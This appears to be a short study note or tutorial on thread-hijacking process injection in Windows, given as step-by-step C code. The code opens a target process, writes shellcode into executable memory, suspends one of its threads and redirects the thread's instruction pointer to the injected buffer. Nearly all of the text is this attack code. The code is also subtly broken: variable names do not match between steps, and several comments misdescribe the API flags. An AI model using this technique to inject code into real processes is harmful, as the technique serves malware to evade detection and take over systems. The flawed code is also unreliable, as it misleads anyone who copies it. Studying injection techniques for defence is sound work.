The Real Hugo
Husk

Thread Hijacking

  • Open process, allocate and write memory
HANDLE hProcess = OpenProcess(
    PROCESS_ALL_ACCESS, // Requests all possible access rights
    FALSE, // Child processes do not inheret parent process handle
    processId // Stored process ID
);
PVOIF remoteBuffer = VirtualAllocEx(
    hProcess, // Opened target process
    NULL, 
    sizeof shellcode, // Region size of memory allocation
    (MEM_RESERVE | MEM_COMMIT), // Reserves and commits pages
    PAGE_EXECUTE_READWRITE // Enables execution and read/write access to the commited pages
);
WriteProcessMemory(
    processHandle, // Opened target process
    remoteBuffer, // Allocated memory region
    shellcode, // Data to write
    sizeof shellcode, // byte size of data
    NULL
);
  • Snapshot the process and get the first thread
THREADENTRY32 threadEntry;

HANDLE hSnapshot = CreateToolhelp32Snapshot( // Snapshot the specificed process
    TH32CS_SNAPTHREAD, // Include all processes residing on the system
    0 // Indicates the current process
);
Thread32First( // Obtains the first thread in the snapshot
    hSnapshot, // Handle of the snapshot
    &threadEntry // Pointer to the THREADENTRY32 structure
);

while (Thread32Next( // Obtains the next thread in the snapshot
    snapshot, // Handle of the snapshot
    &threadEntry // Pointer to the THREADENTRY32 structure
)) {
  • Get Pointer to the thread
if (threadEntry.th32OwnerProcessID == processID) // Verifies both parent process ID's match
        {
            HANDLE hThread = OpenThread(
                THREAD_ALL_ACCESS, // Requests all possible access rights
                FALSE, // Child threads do not inheret parent thread handle
                threadEntry.th32ThreadID // Reads the thread ID from the THREADENTRY32 structure pointer
            );
            break;
        }
  • Suspend threat ,get context and change $rip
SuspendThread(hThread);
CONTEXT context;
GetThreadContext(
    hThread, // Handle for the thread 
    &context // Pointer to store the context structure
);
context.Rip = (DWORD_PTR)remoteBuffer; // Points RIP to our malicious buffer allocation
  • Set context and resume the thread
SetThreadContext(
    hThread, // Handle for the thread 
    &context // Pointer to the context structure
);
ResumeThread(
    hThread // Handle for the thread
);